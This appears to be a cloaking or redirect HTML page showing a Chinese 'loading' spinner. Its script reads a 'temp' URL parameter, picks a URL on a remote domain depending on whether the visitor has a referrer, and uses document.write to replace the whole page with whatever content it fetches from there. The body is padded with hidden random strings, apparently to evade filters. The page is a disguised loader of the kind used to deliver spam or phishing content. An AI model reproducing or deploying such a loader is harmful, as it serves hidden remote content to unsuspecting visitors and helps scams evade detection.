<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ouhLO8pl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ouhLO8pl .jmRFQrZ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ouhLO8pl .content {
            line-height: 50px;
            text-align: center
        }

        .ouhLO8pl .img {
            width: 100%
        }

        .ouhLO8pl .XSuStejzi1p {
            text-align: center
        }

        .ouhLO8pl .XSuStejzi1p span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ouhLO8pl .XSuStejzi1p span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ouhLO8pl .XSuStejzi1p span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ouhLO8pl .XSuStejzi1p span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ouhLO8pl .XSuStejzi1p span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ouhLO8pl .XSuStejzi1p span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ouhLO8pl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MNQW8Wy20(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SQ7ZWS = MNQW8Wy20('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SQ7ZWS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SQ7ZWS +".html?a=share";
		}
		
        fgzHwn=url+"#"+new Date().getTime();
        fgzHwn && function() {
            $.get(fgzHwn, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>uYihMcZkjojnqVuYMKy5oqnkVnsCducRQBkoRta6P4cl81qdg0tRQmkeiuKDgu8</a>
<div style='display:none'>xjO72WJl0gal5k87D5r6pWbQeUUuv</div>
<img  src='' style='display:none'>
<p  style='display:none'>HKsSlNBL71cttYb90m4RfHBIseUbbC2HpmOFmQqGYBn2AvLSau</p>
<div style='display:none'>xjO72WJl0gal5k87D5r6pWbQeUUuv</div>
<b style='display:none' >owILZtXo9ZxMUdEb4PA20ckHRKICsTINa93Vijjil1RZvzSLcNYa46BBD1wysWmeyl0XWbftpQERgSzMjWa5DxWbjDfdCt</b>
<a  href='#' style='display:none'>uYihMcZkjojnqVuYMKy5oqnkVnsCducRQBkoRta6P4cl81qdg0tRQmkeiuKDgu8</a>
<h1 style='display:none' >jP8psgxoZmNLbg5fepDSCxO</h1>
<ul style='display:none' >j1gIiFVm5MObSbe7F8MyUSdZC3frBtckdbmyr4pebPHjD845DiRfHzRmhmZeJMCoznZVhJ1FLvIXXc0zO</ul><div class="ouhLO8pl">
    <div class="jmRFQrZ">
        <div class="XSuStejzi1p">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>T9L8O3HUYtaBj1pLsZga673QZQjXz7czp46HuMV6VNlqwLMMZXHrIC1sO8bGwlieWXDSzWCDUYM9KwfUvYARQYdnQCCCO3Lvi</a>
<div style='display:none'>yuZv1C66iliCEqJjFSIGWzcGzGbgHZPdUEe07Txa43yoOXXtABV76</div>
<li style='display:none' >asjoFBMKFZ1t74zxbSK0LDpL4A8cxBczWPdH1ssh9PblTPdMMfj21t</li>
<h1 style='display:none' >CU1u9RvZwMUGPIyn5H61UIEPM8ZzQajBR4ZAmUd5RfHTXOlpXpOUW4LpQ3EW0JN4qorGceVFVOJ4MTfgW</h1>
<div style='display:none'>yuZv1C66iliCEqJjFSIGWzcGzGbgHZPdUEe07Txa43yoOXXtABV76</div>
<b style='display:none' >KC1z8m1PHrZRRj5MSBMeHFUjOCL4Z2TiGcXReK4zICFThWyQBoxrO3xBIi3y</b>
<div style='display:none'>yuZv1C66iliCEqJjFSIGWzcGzGbgHZPdUEe07Txa43yoOXXtABV76</div></body>
</html>